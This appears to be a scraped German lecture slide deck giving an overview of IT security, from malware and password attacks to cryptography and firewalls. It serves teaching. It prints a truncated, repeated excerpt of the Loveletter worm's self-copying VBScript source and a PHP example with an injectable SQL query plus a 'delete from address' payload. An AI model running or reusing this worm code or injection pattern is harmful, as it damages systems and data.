51
© Prof. Till Hänisch, Prof. Dr. Hans Jürgen Ott 1 Univ. of Cooperative Education Heidenheim, Dpt. of Business Information Systems IT Sicherheit Ein Überblick

© Prof. Till Hänisch, Prof. Dr. Hans Jürgen Ott 1 Univ. of Cooperative Education Heidenheim, Dpt. of Business Information Systems IT Sicherheit Ein Überblick

Embed Size (px)

Citation preview

  • Folie 1
  • Prof. Till Hnisch, Prof. Dr. Hans Jrgen Ott 1 Univ. of Cooperative Education Heidenheim, Dpt. of Business Information Systems IT Sicherheit Ein berblick
  • Folie 2
  • Prof. Till Hnisch, Prof. Dr. Hans Jrgen Ott 2 Univ. of Cooperative Education Heidenheim, Dpt. of Business Information Systems
  • Folie 3
  • Prof. Till Hnisch, Prof. Dr. Hans Jrgen Ott 3 Univ. of Cooperative Education Heidenheim, Dpt. of Business Information Systems
  • Folie 4
  • Prof. Till Hnisch, Prof. Dr. Hans Jrgen Ott 4 Univ. of Cooperative Education Heidenheim, Dpt. of Business Information Systems
  • Folie 5
  • Prof. Till Hnisch, Prof. Dr. Hans Jrgen Ott 5 Univ. of Cooperative Education Heidenheim, Dpt. of Business Information Systems
  • Folie 6
  • Prof. Till Hnisch, Prof. Dr. Hans Jrgen Ott 6 Univ. of Cooperative Education Heidenheim, Dpt. of Business Information Systems Inhalt l berblick l Potentielle Risiken (Auswahl) l Beispiele fr Lsungen Authentisierung Wer greift auf Daten/Systeme zu ? Verschlsselung Daten vertraulich halten Firewall Netze gegen Angreifer schtzen l Was tun ?
  • Folie 7
  • Prof. Till Hnisch, Prof. Dr. Hans Jrgen Ott 7 Univ. of Cooperative Education Heidenheim, Dpt. of Business Information Systems Datensicherheit: DIN 44300, Teil 1. l Schutz von Daten gegen Beeintrchtigung (Verlust, Zerstrung, nderung) und vor Mibrauch l Datenschutz: Schutz von Personen vor Beeintrchtigungen durch Verarbeitung von Daten Spionage Betrug (Nicht-) Verfgbarkeit Sabotage
  • Folie 8
  • Prof. Till Hnisch, Prof. Dr. Hans Jrgen Ott 8 Univ. of Cooperative Education Heidenheim, Dpt. of Business Information Systems Sicherheitskriterien l Integritt Konsistenz Korrektheit DoS, DDoS, mail flooding l Vertraulichkeit Zugriff nur durch berechtigte Personen Hacker l Verbindlichkeit Authentisierung von Nutzern Persistenz fake orders spoofing l Verfgbarkeit Zugriff jederzeit mglich Spionage Betrug Nicht- Verfgbarkeit Sabotage Beispiele fr Risiken Viren Schaden weltweit 2003: 50 Milliarden $ ???
  • Folie 9
  • Prof. Till Hnisch, Prof. Dr. Hans Jrgen Ott 9 Univ. of Cooperative Education Heidenheim, Dpt. of Business Information Systems MS Outlook Loveletter: Liebe macht blind.... @ MS Outlook @ @ @ @ @ @ @ @ @ @ @
  • Folie 10 =1) then wscr.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows Scripting Host\Settings\Timeout",0,"REG_DWORD" end if Set dirwin = fso.GetSpecialFolder(0) Set dirsystem = fso.GetSpecialFolder(1) Set dirtemp = fso.GetSpecialFolder(2) Set c = fso.GetFile(WScript.ScriptFullName) c.Copy(dirsystem&"\MSKernel32.vbs") c.Copy(dirwin&"\Win32DLL.vbs") c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs").... rem barok -loveletter(vbe) rem by: spyder / [email protected] / @GRAMMERSoft Group / Manila,Philippines On Error Resume Next dim fso,dirsystem,dirwin,dirtemp,eq,ctr,file,vbscopy,dow eq="" ctr=0 Set fso = CreateObject("Scripting.FileSystemObject") set file = fso.OpenTextFile(WScript.ScriptFullname,1) vbscopy=file.ReadAll main() sub main() On Error Resume Next dim wscr,rr set wscr=CreateObject("WScript.Shell") rr=wscr.RegRead("HKEY_CURRENT_USER\Software\Microsoft\Windows Scripting Host\Settings\Timeout") if (rr>=1) then wscr.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows Scripting Host\Settings\Timeout",0,"REG_DWORD" end if Set dirwin = fso.GetSpecialFolder(0) Set dirsystem = fso.GetSpecialFolder(1) Set dirtemp = fso.GetSpecialFolder(2) Set c = fso.GetFile(WScript.ScriptFullName) c.Copy(dirsystem&"\MSKernel32.vbs") c.Copy(dirwin&"\Win32DLL.vbs") c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")....">
  • Prof. Till Hnisch, Prof. Dr. Hans Jrgen Ott 10 Univ. of Cooperative Education Heidenheim, Dpt. of Business Information Systems Loveletter Quelltext (Auszug) rem barok -loveletter(vbe) rem by: spyder / [email protected] / @GRAMMERSoft Group / Manila,Philippines On Error Resume Next dim fso,dirsystem,dirwin,dirtemp,eq,ctr,file,vbscopy,dow eq="" ctr=0 Set fso = CreateObject("Scripting.FileSystemObject") set file = fso.OpenTextFile(WScript.ScriptFullname,1) vbscopy=file.ReadAll main() sub main() On Error Resume Next dim wscr,rr set wscr=CreateObject("WScript.Shell") rr=wscr.RegRead("HKEY_CURRENT_USER\Software\Microsoft\Windows Scripting Host\Settings\Timeout") if (rr>=1) then wscr.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows Scripting Host\Settings\Timeout",0,"REG_DWORD" end if Set dirwin = fso.GetSpecialFolder(0) Set dirsystem = fso.GetSpecialFolder(1) Set dirtemp = fso.GetSpecialFolder(2) Set c = fso.GetFile(WScript.ScriptFullName) c.Copy(dirsystem&"\MSKernel32.vbs") c.Copy(dirwin&"\Win32DLL.vbs") c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs").... rem barok -loveletter(vbe) rem by: spyder / [email protected] / @GRAMMERSoft Group / Manila,Philippines On Error Resume Next dim fso,dirsystem,dirwin,dirtemp,eq,ctr,file,vbscopy,dow eq="" ctr=0 Set fso = CreateObject("Scripting.FileSystemObject") set file = fso.OpenTextFile(WScript.ScriptFullname,1) vbscopy=file.ReadAll main() sub main() On Error Resume Next dim wscr,rr set wscr=CreateObject("WScript.Shell") rr=wscr.RegRead("HKEY_CURRENT_USER\Software\Microsoft\Windows Scripting Host\Settings\Timeout") if (rr>=1) then wscr.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows Scripting Host\Settings\Timeout",0,"REG_DWORD" end if Set dirwin = fso.GetSpecialFolder(0) Set dirsystem = fso.GetSpecialFolder(1) Set dirtemp = fso.GetSpecialFolder(2) Set c = fso.GetFile(WScript.ScriptFullName) c.Copy(dirsystem&"\MSKernel32.vbs") c.Copy(dirwin&"\Win32DLL.vbs") c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")....
  • Folie 11
  • Prof. Till Hnisch, Prof. Dr. Hans Jrgen Ott 11 Univ. of Cooperative Education Heidenheim, Dpt. of Business Information Systems Aktuelle Viren Intervall zwischen Entdeckungn und Schutz durch Anti-Viren Software !
  • Folie 12
  • Prof. Till Hnisch, Prof. Dr. Hans Jrgen Ott 12 Univ. of Cooperative Education Heidenheim, Dpt. of Business Information Systems SQL-Injection....... File index.htm... $selstring = "SELECT * FROM Address WHERE name=$sstring'"; $conn = pg_Connect("localhost", "5432","","","somedb"); $result = pg_Exec($conn, $selstring);... File db-request.php Maier Maier; delete from address
  • Folie 13
  • Prof. Till Hnisch, Prof. Dr. Hans Jrgen Ott 13 Univ. of Cooperative Education Heidenheim, Dpt. of Business Information Systems Distributed Denial-of-Service Attack (DDoS). victim Angriff slave installing a demon master Hack Angreifer Probleme: Unterschied zwischen echten und falschen Anfragen Verteilte Netzwerk- Infrastruktur Intrusion Detection Systems http://www.iss.net
  • Folie 14
  • Prof. Till Hnisch, Prof. Dr. Hans Jrgen Ott 14 Univ. of Cooperative Education Heidenheim, Dpt. of Business Information Systems Wardriving, LAN jacking
  • Folie 15
  • Prof. Till Hnisch, Prof. Dr. Hans Jrgen Ott 15 Univ. of Cooperative Education Heidenheim, Dpt. of Business Information Systems Gegenmanahmen VerfgbarkeitVerbindlichkeitVertraulichkeitIntegritt intrusion detection Digitale Signaturen Verschlssel- ung, VPN Firewall Zugangs- kontrolle Backup Paswort Biometrie Virenscanner Managed Security Services
  • Folie 16
  • Prof. Till Hnisch, Prof. Dr. Hans Jrgen Ott 16 Univ. of Cooperative Education Heidenheim, Dpt. of Business Information Systems Script Kiddies Ntige Vorkenntnisse der Hacker complexity of hacker tools source: c't 2/2002, S. 79 guessing of passwords viruses cracking of passwords intrusion into not secured system web worms
  • Folie 17
  • Prof. Till Hnisch, Prof. Dr. Hans Jrgen Ott 17 Univ. of Cooperative Education Heidenheim, Dpt. of Business Information Systems Beispiel: Unberechtigten Zugriff verhindern l user identification Passwort, Biometrie, Authentisierungsverfahren l Nutzerrechte Wer darf auf welche Resourcen zugreifen l Zugriffskontrolle firewall, Intrusion Detection Systeme l Verschlsselung Zugriff auf Daten bleibt zwar mglich, diese sind aber nutzlos
  • Folie 18
  • Prof. Till Hnisch, Prof. Dr. Hans Jrgen Ott 18 Univ. of Cooperative Education Heidenheim, Dpt. of Business Information Systems lBrute force hack Ausprobieren aller Buchstabenkombinationen lDictionary hack Systematisches Ausprobieren von hufiger verwendeten Wrtern (aus Worllisten) Hybride Verfahren : Kombination von Wrterbuch und Ausprobieren von Buchstanben/Zahlen lSpionage Blick ber die Schulter Trojanische Pferde, key logger lSocial Engineering Ausnutzen der Naivitt von Anwendern Z.B. fake mail an Angestellte mit sender spoofing ("IT security dept.") zur Abfrage von Kennwrtern Studie von BBC News zeigte, da 92% der Teilnehmer bereit waren, persnliche Angaben wie etwa Geburtsname der Mutter, Grundschule,... Zu verraten (Comm. ACM Vol. 48/6 p. 10) Password cracking.
  • Folie 19
  • Prof. Till Hnisch, Prof. Dr. Hans Jrgen Ott 19 Univ. of Cooperative Education Heidenheim, Dpt. of Business Information Systems Default Kennwrter
  • Folie 20
  • Prof. Till Hnisch, Prof. Dr. Hans Jrgen Ott 20 Univ. of Cooperative Education Heidenheim, Dpt. of Business Information Systems Ziemlich einfach...
  • Folie 21
  • Prof. Till Hnisch, Prof. Dr. Hans Jrgen Ott 21 Univ. of Cooperative Education Heidenheim, Dpt. of Business Information Systems Social Engineering. Original und Flschung
  • Folie 22
  • Prof. Till Hnisch, Prof. Dr. Hans Jrgen Ott 22 Univ. of Cooperative Education Heidenheim, Dpt. of Business Information Systems Beispiel Telekom Phishing mail
  • Folie 23
  • Prof. Till Hnisch, Prof. Dr. Hans Jrgen Ott 23 Univ. of Cooperative Education Heidenheim, Dpt. of Business Information Systems Biometrie
  • Folie 24
  • Prof. Till Hnisch, Prof. Dr. Hans Jrgen Ott 24 Univ. of Cooperative Education Heidenheim, Dpt. of Business Information Systems eTokens. http://www.aks.com/
  • Folie 25
  • Prof. Till Hnisch, Prof. Dr. Hans Jrgen Ott 25 Univ. of Cooperative Education Heidenheim, Dpt. of Business Information Systems Verschlsselung Problem Datenbertragung ber ffentliche Netze ist ffentlich ! (insbesondere bei Funknetzen) Lsung Private Netze (teuer) oder Verschlsselung: Der Absender wendet (mathematische) Funktion auf die Daten an, die nur (!) vom Empfnger rckgngig gemacht werden kann Absender: E = e(K 1,M) : K = key, M = message Empfnger: M = d(K 2,E) : E = encrypted message, Funktioniert, wenn M = d(K 2,e(K 1,M)) symmetrisch, wenn K 1 =K 2, sonst asymmetrisch
  • Folie 26
  • Prof. Till Hnisch, Prof. Dr. Hans Jrgen Ott 26 Univ. of Cooperative Education Heidenheim, Dpt. of Business Information Systems Substitutionsschlssel Einfache Verschlsselungstechnik: Jedes Zeichen wird durch ein anderes ersetzt Das Transformationsschema ist der Schlssel: Originalalphabet: abcdefghijklmnopqrstuvwxyz Schlssel: qfwgxbdkpjhyzstiarnouvcelm Verschlsselter Text: q wkpbbrx kqn ot xsnurx xauqy irtfqfpypopxn btr qyy wkqrqwoxrn ot irxvxso npziyx brxauxswl fqnxg qsqylnpn q npziyx nufnopouopts pn sto nubbpwpxso qslftgl cpok q fpo tb opzx tr q wtziuoxr wqs frxqh nuwk wtgxn xqnpyl okxnx wtgxn cxrx unxg usopy okx spsxoxxsok wxsourl qsg cxrx rxiyqwxg fl wtgxn okqo wkqsdx okx nufnopouopts iqooxrs cpok xqwk wkqrqwoxr
  • Folie 27
  • Prof. Till Hnisch, Prof. Dr. Hans Jrgen Ott 27 Univ. of Cooperative Education Heidenheim, Dpt. of Business Information Systems Kryptoanalyse Relative Hufigkeit der einzelnen Buchstaben Im verschlsselten TextIn (englischem) Text a 0.006 b 0.020 c 0.011 d 0.003 e 0.000 f 0.026 g 0.023 h 0.003 i 0.020 j 0.000 k 0.040 l 0.020 m 0.000 n 0.062 o 0.085 p 0.060 q 0.071 r 0.051 s 0.051 t 0.040 u 0.037 v 0.003 w 0.048 x 0.114 y 0.028 z 0.011 a 0.096 b 0.015 c 0.038 d 0.039 e 0.114 f 0.020 g 0.013 h 0.035 i 0.071 j 0.002 k 0.003 l 0.047 m 0.030 n 0.065 o 0.082 p 0.034 q 0.001 r 0.061 s 0.067 t 0.095 u 0.028 v 0.008 w 0.016 x 0.005 y 0.012 z 0.002
  • Folie 28
  • Prof. Till Hnisch, Prof. Dr. Hans Jrgen Ott 28 Univ. of Cooperative Education Heidenheim, Dpt. of Business Information Systems Entschlsselter Text a chiffre has to ensure equal probabilities for all characters to prevent simple frequency based analysis a simple substitution is not sufficient anybody with a bit of time or a computer can break such codes easily these codes were used until the nineteenth century and were replaced by codes that change the substitution pattern with each character Gedankenexperiment: Eine Nachricht ist genau ein Zeichen lang Ist hier Kryptoanalyse mglich ? Nein ! Wenn der Schlssel (mindestens) die gleiche Lnge hat, wie die Nachricht, kann sie nicht entschlsselt werden ! One time pad
  • Folie 29
  • Prof. Till Hnisch, Prof. Dr. Hans Jrgen Ott 29 Univ. of Cooperative Education Heidenheim, Dpt. of Business Information Systems Vernam-Chiffre Eine lange, zufllige Folge von Zeichen wird als Schlssel verwendet, Verschlsselung beispielsweise durch Addition mit dem Klartext (modulo 26). Erzeugung von K durch (Pseudo-) Zufallsgenerator Schlssel: AXVBF Text: HALLO Darstellung als Zahlen, z.B. A=1, B=2 usw. Schlssel: 1 24 22 2 6 Text M 1 : 8 1 12 12 15 E 1 : 9 25 8 14 21 (IYHNU) Problem: Wird mehrfach der gleiche Schlssel verwendet, ist Kryptoanalyse mglich: M 2 = WELT, K= HALLO, E 2 = 24 3 8 22 Aber D= E 1 -E 2 = M 1 -M 2 = -15 22 0 -8, wenn M 1 bekannt M 2 = M 1 -D = (8+15) (1-22) (12-0) (12+8) = 23 5 12 20 = WELT known plaintext attack, siehe WEP
  • Folie 30
  • Prof. Till Hnisch, Prof. Dr. Hans Jrgen Ott 30 Univ. of Cooperative Education Heidenheim, Dpt. of Business Information Systems Enigma
  • Folie 31
  • Prof. Till Hnisch, Prof. Dr. Hans Jrgen Ott 31 Univ. of Cooperative Education Heidenheim, Dpt. of Business Information Systems Moderne Verschlsselungsverfahren l Kombination von Substitution und Transposition DES (alt), AES (neu) l symmetrisch: Schlssel fr Sender und Empfnger gleich Problem: Wie bermittelt man den Schlssel ? An viele Partner Lange Schlssel (one time pad) Ungelst ! l asymmetrisch: unterschiedliche Schlssel zum Ver- und Entschlsseln Public/Private key Diskrete Mathematik: Faktorisierung groer Zahlen ist (extrem) rechenaufwndig l Signatur: one way functions
  • Folie 32
  • Prof. Till Hnisch, Prof. Dr. Hans Jrgen Ott 32 Univ. of Cooperative Education Heidenheim, Dpt. of Business Information Systems Typen von Verschlsselungsverfahren Stromschlssel verschlsseln eine Folge von einzelnen Zeichen Schlssel blicherweise durch Zufallsgenerator Blockschlssel verschlsseln Blcke fester Lnger (typ. 64 Bit)
  • Folie 33
  • Prof. Till Hnisch, Prof. Dr. Hans Jrgen Ott 33 Univ. of Cooperative Education Heidenheim, Dpt. of Business Information Systems DES Anforderungen l 1973 wurde vom NIST die Entwicklung eines Verschlsselungsverfahrens ausgeschrieben, Anforderungen: Hohe Sicherheit Effizient implementierbar flexibel Sicherheit soll nur vom Schlssel abhngen, nicht von einem geheimen Algorithmus l Vorschlag von IBM wurde (von NSA berprft und berarbeitet) akzeptiert und standardisiert l Blockchiffre l 56 Bit (64 Bit) Schlssellnge
  • Folie 34
  • Prof. Till Hnisch, Prof. Dr. Hans Jrgen Ott 34 Univ. of Cooperative Education Heidenheim, Dpt. of Business Information Systems DES Funktionsweise [http://www.itl.nist.gov/fipspubs/fip46-2.htm]
  • Folie 35
  • Prof. Till Hnisch, Prof. Dr. Hans Jrgen Ott 35 Univ. of Cooperative Education Heidenheim, Dpt. of Business Information Systems Aktueller Stand l DES mit 56 Bit Schlssellnge ist heute durch brute force knackbar 1998 deep crack ca. 24 Stunden, ca. 300.000$ 2006 COPACABANA, ca. 1 Woche, ca. 10.000 $ NSA kann vermutlich DES in 3-15 Minuten knacken, ca. 50.000 $ [Schneier, Applied Cryptography] l Triple DES Dreimal hintereinander DES, langsam ! Verschiedene Verfahren mit zwei oder drei verschiedenen Schlsseln Effektive Schlssellnge 112 Bit Z.B. Geldautomaten l AES als Ersatz seit 2000 Variable Block- und Schlssellnge (bis 256 Bit) Z.B. WPA2, SSH, IPSEC, Windows EFS
  • Folie 36
  • Prof. Till Hnisch, Prof. Dr. Hans Jrgen Ott 36 Univ. of Cooperative Education Heidenheim, Dpt. of Business Information Systems Integritt l unbeabsichtigte nderungen bertragungsfehler, Hardware,... l Prsummen beabsichtigte nderungen Prfsummen sind leicht zu flschen krypthografische Verfahren
  • Folie 37
  • Prof. Till Hnisch, Prof. Dr. Hans Jrgen Ott 37 Univ. of Cooperative Education Heidenheim, Dpt. of Business Information Systems Beispiel: MD5 l erzeugt aus einer beliebig langen Nachricht einen 128 Bit langen Wert l Beispiel: Der Text Heute ist schnes Wetter ergibt den Hash a353cee72e0558710e2f89fb18841283a Empfnger berechnet ebenfalls den MD5 Hash der Nachricht und vergleicht mit dem bermittelten, ereinstimmung --> Nachricht korrekt bermittelt l Problem: Dritte Partei fngt die Nachricht ab und ersetzt sie durch eine andere (mit neuem, passenden hash) l Lung: Der Absender verschlsselt den hash-Wert mit seinem private key. Der Empfnger berprft nach Entschlsselung mit dem public key des Absenders.(Digitale Signatur)
  • Folie 38
  • Prof. Till Hnisch, Prof. Dr. Hans Jrgen Ott 38 Univ. of Cooperative Education Heidenheim, Dpt. of Business Information Systems Firewalls Internet LAN Firewall Eine Firewall ist ein zentraler Kontrollpunkt zwischen dem Internet und dem LAN
  • Folie 39
  • Prof. Till Hnisch, Prof. Dr. Hans Jrgen Ott 39 Univ. of Cooperative Education Heidenheim, Dpt. of Business Information Systems Router Internet Router leitet IP-Pakete weiter, vom LAN ins Internet, vom Internet ins LAN Screening Router (Paketfilter) leitet nur Pakete weiter, die def. Regeln entsprechen (IP-Adressen, Ports usw.)
  • Folie 40
  • Prof. Till Hnisch, Prof. Dr. Hans Jrgen Ott 40 Univ. of Cooperative Education Heidenheim, Dpt. of Business Information Systems Personal firewall Internet Computer Browser Mail client Application Personal Firewall Eine personal firewall ist ein eingebauter Paketfilter, der anwendungsbezogen filtert Die Sicherheit ist fragwrdig Oft kombiniert mit Viren-Scanner
  • Folie 41
  • Prof. Till Hnisch, Prof. Dr. Hans Jrgen Ott 41 Univ. of Cooperative Education Heidenheim, Dpt. of Business Information Systems Was wird gemacht ? 81 58 55 29 26 24 79 82 52 71 34 30 37 17 43 86 29 antivirus software Virtual Private Networks (VPN) automatic backup personal firewalls content filtering intrusion detection systems network firewalls application irewalls Dial-Back- or secure modems Germany USA source: IT-Security 2003; Juni-Juli, 2500 Interviews with CIOs; in Percent
  • Folie 42
  • Prof. Till Hnisch, Prof. Dr. Hans Jrgen Ott 42 Univ. of Cooperative Education Heidenheim, Dpt. of Business Information Systems Best practices. l Einsatz einer application layer firewall. l Automatische Updates der Virenschutz-Software auf Firewall, Servern und Clients l Aktuelle Updates einspielen: Hackers nutzen oft bekannte Sicherheitslcken aus, um in Systeme einzubrechen l Abschalten aller nicht bentigten Dienste l Lschen aller nicht bentigten Programme l Netzwerke nach backdoors, Trojanern und anderen Sicherheitslcken scannen, Intrusion Detection Systeme verwenden
  • Folie 43
  • Prof. Till Hnisch, Prof. Dr. Hans Jrgen Ott 43 Univ. of Cooperative Education Heidenheim, Dpt. of Business Information Systems Probleme bei sicheren Systemen l Die meisten (einfachen) Angriffe sind leicht abzublocken l Wie hlt man qualifizierte/motivierte Hacker auf ? l Tradeoff: Sicherheit UsabilityKosten Problem: Schlechte Usability kann Sicherheit verschlechtern: Restriktive Password policy --> schwer zu merken --> Nutzer schreiben Passwrter auf oder verwenden Standardpawort
  • Folie 44
  • Prof. Till Hnisch, Prof. Dr. Hans Jrgen Ott 44 Univ. of Cooperative Education Heidenheim, Dpt. of Business Information Systems Clevere Lsungen..... l Persnliche Fragen statt Kennwrtern personal entropy Name Ihres Haustiers ? Der Name von Paris Hiltons Hund ist Tinkerbell (Bunte o..) Ihr T-Mobile Account wurde gehackt l Nach mehrfacher Eingabe eines falschen Kennworts wird der login fr bestimmte Zeit gesperrt Sie bieten auf einen Artikel bei ebay und wissen den Namen eines Mitbieters, versuchen sich mit seinem Namen und einem beliebigen Kennwort anzumelden --> sein Account wird geblockt --> Denial of Service attack l Was wre, wenn Geldautomaten den Fingerabdruck prfen wrden ? Vielleicht weniger Betrug ? Vielleicht mehr Raubberflle? (siehe Wegfahrsperre)
  • Folie 45
  • Prof. Till Hnisch, Prof. Dr. Hans Jrgen Ott 45 Univ. of Cooperative Education Heidenheim, Dpt. of Business Information Systems Auch die fortschrittlichste Technologie....
  • Folie 46
  • Prof. Till Hnisch, Prof. Dr. Hans Jrgen Ott 46 Univ. of Cooperative Education Heidenheim, Dpt. of Business Information Systems Lt sich umgehen, wenn man wirklich will....
  • Folie 47
  • Prof. Till Hnisch, Prof. Dr. Hans Jrgen Ott 47 Univ. of Cooperative Education Heidenheim, Dpt. of Business Information Systems Man kann Angreifern nur das Leben schwerer machen
  • Folie 48
  • Prof. Till Hnisch, Prof. Dr. Hans Jrgen Ott 48 Univ. of Cooperative Education Heidenheim, Dpt. of Business Information Systems Es gibt keine absolute Sicherheit l Wenn jemand behauptet, ein unknackbares System zu haben, ist er entweder naiv, oder er lgt ! Das schwchste Glied zhlt SQL-Slammer took out 20% of ATM machines in US (costed banks tens of millions of dollars), Continental coudnt fly for 12 hours, why ? Not the servers were vulnerable, but the network connections were overloaded. l Designschwchen (Protokolle, Programmiersprachen,...) Wurden nicht fr die heutigen Anwendungen konzipiert Lsungen wren bekannt, sind aber aufwendig: Direkter Zugriff auf den Stack bei vielen Programmiersprachen Buffer overflows knnten verhindert werden, ist aber mehr Arbeit SQL-injection knnte verhindert werden, ebenfalls mehr Arbeit l Programmierfehler (bugs) ermglichen exploits, Patches kommen immer zu spt (zero day exploits) Fehlerfreie Software zu erstellen ist extrem schwer (unmglich ?) Bessere Prozee bei der SW-Entwicklung helfen, aber...
  • Folie 49
  • Prof. Till Hnisch, Prof. Dr. Hans Jrgen Ott 49 Univ. of Cooperative Education Heidenheim, Dpt. of Business Information Systems
  • Folie 50
  • Prof. Till Hnisch, Prof. Dr. Hans Jrgen Ott 50 Univ. of Cooperative Education Heidenheim, Dpt. of Business Information Systems Was ist sicher genug l Wieviel Sicherheit wird gebraucht ? Analyse der Risiken, Schden usw. ntig Online Wettervorhersage vs. Online-banking l Wieviel Sicherheit ist gewollt ? Usability Kosten l Umgang mit Risiken technisch Organisatorisch (Schulungen,...) l Keine Standardlsungen l Security ist eine boomende Branche Communications of the ACM Vol 48/6 pp. 82
  • Folie 51
  • Prof. Till Hnisch, Prof. Dr. Hans Jrgen Ott 51 Univ. of Cooperative Education Heidenheim, Dpt. of Business Information Systems Fragen ?